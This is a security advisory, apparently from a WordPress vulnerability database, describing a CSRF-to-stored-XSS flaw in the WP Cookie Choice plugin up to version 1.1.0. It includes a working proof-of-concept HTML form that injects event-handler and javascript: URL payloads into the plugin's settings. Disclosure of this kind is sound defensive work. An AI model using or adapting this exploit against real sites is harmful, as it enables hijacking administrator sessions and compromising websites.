WordPress Plugin Vulnerabilities

WP Cookie Choice <= 1.1.0 - CSRF to Stored Cross-Site Scripting

Description

The plugin is lacking any CSRF check when saving its options, and do not escape them when outputting them in attributes. As a result, an attacker could make a logged in admin change them to arbitrary values including XSS payloads via a CSRF attack.

Proof of Concept

<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=wp-cookiechoise" method="POST">
<input type="text" name="send" value="send">
<input type="text" name="cookiechoice_close" value="">
<input type="text" name="cookiechoice_more" value='" autofocus=autofocus onfocus=alert(String.fromCharCode(111,112,115)) e="'>
<input type="text" name="cookiechoice_url" value="javascript:alert(String.fromCharCode(111,112,115))">
<input type="checkbox" name="cookiechoice_active" value="1" checked="checked">
<input type="submit" value="submit">
</form>
</body>
</html>

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2021-09-20 (about 2 years ago)
Added
2021-09-20 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other